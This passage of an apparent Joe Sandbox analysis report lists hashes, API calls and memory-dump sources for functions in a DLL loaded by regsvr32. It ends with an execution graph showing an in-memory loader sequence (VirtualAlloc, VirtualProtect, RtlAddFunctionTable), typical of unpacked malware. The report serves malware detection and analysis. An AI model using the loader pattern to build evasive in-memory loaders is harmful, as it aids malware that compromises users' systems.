                                                                                                                                      • Opcode ID: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                      • Instruction ID: 81a711615a77211ccf0a9eca7df964cd8f82e293bc0fe5c537daf2256271f590
                                                                                                                                      • Opcode Fuzzy Hash: 2467c4f6b5832abe9fd2be6a03a61b6f94b407d58b9f6526efad8e926ce1459f
                                                                                                                                      • Instruction Fuzzy Hash: 7D01BA23E0D4AAD1EE64DB63D4B58795361BF8074CF441936D64E46592DF6EF890C330
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                      • Opcode ID: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                      • Instruction ID: a243bd6c685d934cf4c0b4df2c90709531ab772f5695964320c6b7d58b1a6a69
                                                                                                                                      • Opcode Fuzzy Hash: 66c2a68ae6921ce3eae9ed6cb47659e8359417b2a45b1d2ea151f135524af05a
                                                                                                                                      • Instruction Fuzzy Hash: 1FB19F32B1DB99C9EB20DB23E0645AA77A0FB89748F405935EA8E43785EF3CD105C760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$Sleep_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2081351063-0
                                                                                                                                      • Opcode ID: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                      • Instruction ID: d0beb6dd9ef6d10319de2a3f843a30104307bd5ac85304b42cf54ba9d1ef8315
                                                                                                                                      • Opcode Fuzzy Hash: ec136e1b37b0cf75a1e1cbd0173697211363db55ec0de315659f58b3930cb5b5
                                                                                                                                      • Instruction Fuzzy Hash: C5311B21A0D66AC5EB149B23C4B9679A7A1BF44FC8F489835DA0D07796EE7CE840C370
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC672072FD
                                                                                                                                      • DecodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC6720730C
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC67207389
                                                                                                                                        • Part of subcall function 00007FFC6720318C: realloc.LIBCMT ref: 00007FFC672031B7
                                                                                                                                        • Part of subcall function 00007FFC6720318C: Sleep.KERNEL32(?,?,00000000,00007FFC67207379,?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2), ref: 00007FFC672031D3
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC67207398
                                                                                                                                      • EncodePointer.KERNEL32(?,?,?,00007FFC672073E5,?,?,?,?,00007FFC672034D2,?,?,?,00007FFC672021CB), ref: 00007FFC672073A4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1310268301-0
                                                                                                                                      • Opcode ID: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                      • Instruction ID: 390775e2edd1e3f4f96a566f7b815eef1d19aa0ddfebf6c7d12dcff6c543ed69
                                                                                                                                      • Opcode Fuzzy Hash: 45f99762a2f7ec127277c333d1f44571b1c8f3f0bb701b28e9aac5b400b42b2d
                                                                                                                                      • Instruction Fuzzy Hash: 47215E11B0D66AD1EE14EB63E5AC0A9A3A1BF45BC8F444C36DA0D0B796DE7CE485C370
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Pointer$Encode$Decode$Sleep_errnorealloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1310268301-0
                                                                                                                                      • Opcode ID: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                      • Instruction ID: 29134fd4536d75a868eae26db991d65554ca4ded1a5db3458d4d6040f37f2b25
                                                                                                                                      • Opcode Fuzzy Hash: eece0b224e2bcc70f9921190d9f8722cba86776407b6ce9ac89865c4675fc459
                                                                                                                                      • Instruction Fuzzy Hash: C9218311B0D6AAD9EE14EB23A568179A391FF457D8F484C35EA4D07756DE3CE085C330
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FFC67203359,?,?,00000028,00007FFC67206C7D,?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19), ref: 00007FFC6720331F
                                                                                                                                      • GetProcAddress.KERNEL32(?,?,000000FF,00007FFC67203359,?,?,00000028,00007FFC67206C7D,?,?,00000000,00007FFC672030C0,?,?,00000000,00007FFC67206B19), ref: 00007FFC67203334
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 1646373207-1276376045
                                                                                                                                      • Opcode ID: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                      • Instruction ID: 2a938dc926b5c0b9fa411cb5e9c7b437ebbe2c893a09c44f0e961a4b48c5679b
                                                                                                                                      • Opcode Fuzzy Hash: d72bc5d50b22d09011b632762878156ef0257bf259d16f3c3461911ef1dd3856
                                                                                                                                      • Instruction Fuzzy Hash: A7E01290F1D62AC2FE19DB62A8A453413D1BF59B24B485C3CD91F063A1DE7CB698C370
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00007FFC6720309C: Sleep.KERNEL32(?,?,00000000,00007FFC67206B19,?,?,00000000,00007FFC67206BC3,?,?,?,?,?,?,00000000,00007FFC67202DC8), ref: 00007FFC672030D2
                                                                                                                                      • free.LIBCMT ref: 00007FFC672058A5
                                                                                                                                      • free.LIBCMT ref: 00007FFC672058C1
                                                                                                                                        • Part of subcall function 00007FFC67206550: RtlCaptureContext.KERNEL32 ref: 00007FFC6720658F
                                                                                                                                        • Part of subcall function 00007FFC67206550: IsDebuggerPresent.KERNEL32 ref: 00007FFC6720662D
                                                                                                                                        • Part of subcall function 00007FFC67206550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206637
                                                                                                                                        • Part of subcall function 00007FFC67206550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFC67206642
                                                                                                                                        • Part of subcall function 00007FFC67206550: GetCurrentProcess.KERNEL32 ref: 00007FFC67206658
                                                                                                                                        • Part of subcall function 00007FFC67206550: TerminateProcess.KERNEL32 ref: 00007FFC67206666
                                                                                                                                      • free.LIBCMT ref: 00007FFC672058D6
                                                                                                                                        • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                        • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                        • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                      • free.LIBCMT ref: 00007FFC672058F5
                                                                                                                                      • free.LIBCMT ref: 00007FFC67205911
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free$ExceptionFilterProcessUnhandled_errno$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentSleepTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2294642566-0
                                                                                                                                      • Opcode ID: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                      • Instruction ID: 4276924d7a7fa8404bc77b12295b10cff6bcbd15995a92ba7f941c287a3cb2b9
                                                                                                                                      • Opcode Fuzzy Hash: dc7ff44f8b32ef672d501b76c056c74ad4bf38a7a2c0d5bc14e1adea1997e9e3
                                                                                                                                      • Instruction Fuzzy Hash: A751C132B09AA9C2EB20DF27E8285692395FF84B9CF084435DE4D47785DE3CD982C360
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3186804695-0
                                                                                                                                      • Opcode ID: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                      • Instruction ID: 82e6001681c42e2e143193c40d9e8fa88a786f6035bb0c90afb2a43c9544141e
                                                                                                                                      • Opcode Fuzzy Hash: fa6ae430652ad88a2b7c0fc47314cf8fd6a4311639ac00b8795087540084e4bb
                                                                                                                                      • Instruction Fuzzy Hash: B081907260969AD6DB24CF26E1A87AA73A0FB44748F504536DB8D47754EF3CE450CB20
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$DecodePointer_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4201827665-0
                                                                                                                                      • Opcode ID: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                      • Instruction ID: 9a1507799716a424067acef19b74436ad6242f5f3a4d2dd500984cecef7d5beb
                                                                                                                                      • Opcode Fuzzy Hash: 80346bd32cbc0638794b0fd1901a532c5b35ee42fd123eebcbfe5a7804c514a3
                                                                                                                                      • Instruction Fuzzy Hash: 77515D71A0C66AC6FB549B27A8A8B7A2391FF44788F104835DA4D47791EE7DE481C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$DecodePointercalloc
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1531210114-0
                                                                                                                                      • Opcode ID: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                      • Instruction ID: cd13f8574b4c09fb64b3fe15b49106b081bea55c32b150bdfc0a917302f8c17c
                                                                                                                                      • Opcode Fuzzy Hash: 135c3f51b5ce2e738d355fd0c7e716948f0291e158272fe6257324d9ebc5dc22
                                                                                                                                      • Instruction Fuzzy Hash: 6121A722B0C76AC5FB149B56947937B63A0AF44788F044834DB0C07B86DF7CD420CA34
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • _lock.LIBCMT ref: 00007FFC672053B2
                                                                                                                                      • free.LIBCMT ref: 00007FFC672053D7
                                                                                                                                        • Part of subcall function 00007FFC67203024: HeapFree.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720303A
                                                                                                                                        • Part of subcall function 00007FFC67203024: _errno.LIBCMT ref: 00007FFC67203044
                                                                                                                                        • Part of subcall function 00007FFC67203024: GetLastError.KERNEL32(?,?,00000000,00007FFC67202DDC,?,?,?,00007FFC67202DFF,?,?,?,00007FFC6720254F,?,?,?,00007FFC6720262A), ref: 00007FFC6720304C
                                                                                                                                      • _lock.LIBCMT ref: 00007FFC672053F2
                                                                                                                                      • free.LIBCMT ref: 00007FFC67205438
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lockfree$ErrorFreeHeapLast_errno
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188102813-0
                                                                                                                                      • Opcode ID: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                      • Instruction ID: 9ee98894c7752e0a0a3a70345d57bfaff8117d473dd71ed1b6393f8a57a5456f
                                                                                                                                      • Opcode Fuzzy Hash: 09c59b142491067d37077feec729aeb8b77d96716ac98985a4df9f6db3f8d771
                                                                                                                                      • Instruction Fuzzy Hash: 20113C21A0E52AC5FF54ABB3D479BB82390AF8070CF545935E71E162C6EE6CA885C371
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalDeleteSection$Freefree
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1250194111-0
                                                                                                                                      • Opcode ID: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                      • Instruction ID: e4cda339ad3770c2e4a5dd980ec7cd625021262249a79e32b64e6fce61869156
                                                                                                                                      • Opcode Fuzzy Hash: 0b4381b0394cf9d2fe44ee79bc2f59f9ea8a8cfc0730820b202f43bccc0e215f
                                                                                                                                      • Instruction Fuzzy Hash: 7D116331E0D56AC6E614DB16E4A423863A0FF45B58F584931DB5D02A95DF3CD5A1C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _lock$Sleep_errno_getptd
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2111406555-0
                                                                                                                                      • Opcode ID: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                      • Instruction ID: 6fc60f92a8de565253c68e6743dec5bbcffd4f9919da76def16de1102937b01e
                                                                                                                                      • Opcode Fuzzy Hash: 673e868a23441bf53d2040884fedd38da7dd7cebd98ae69a44e812092c6a0ba8
                                                                                                                                      • Instruction Fuzzy Hash: 64019E21A0D25AC6F744BBB3D469BBD6350EF44B88F008834D60D173C6DE2CA894C371
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _errno$_getptd
                                                                                                                                      • String ID: #
                                                                                                                                      • API String ID: 3432092939-1885708031
                                                                                                                                      • Opcode ID: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                      • Instruction ID: bff6a3a35bd2d3ffc70f3406aa67ac0dd75fe473b528921509b2910e3666245b
                                                                                                                                      • Opcode Fuzzy Hash: 9b19af0c0418e3e0b258a70cd69edc5393c065aacbb8da76a6c44f52b7c881eb
                                                                                                                                      • Instruction Fuzzy Hash: E451A322A0C7D9C5D7308B26E86827EABA0FF85B48F584531DA9D13755CE3DD841CB21
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                      • Opcode ID: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                      • Instruction ID: c0a8f02de2ceb39b2edfae624826b32734a106dca11ce9ef83e7c3291cb9be87
                                                                                                                                      • Opcode Fuzzy Hash: b79b3224c3083f646637f6279f6889a3266e8c7020fbd897531d60d37c45b2be
                                                                                                                                      • Instruction Fuzzy Hash: 7951D432A0D6A9C6EA609F23E4681B977A1FF49B88F144935DB9E07781CE3CE451C730
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:10.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:11
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 3264 18475ee0000 3265 18475ee0183 3264->3265 3266 18475ee043e VirtualAlloc 3265->3266 3270 18475ee0462 3266->3270 3267 18475ee0a7b 3268 18475ee0531 GetNativeSystemInfo 3268->3267 3269 18475ee056d VirtualAlloc 3268->3269 3274 18475ee058b 3269->3274 3270->3267 3270->3268 3271 18475ee0a00 3271->3267 3272 18475ee0a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 18475ee09d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
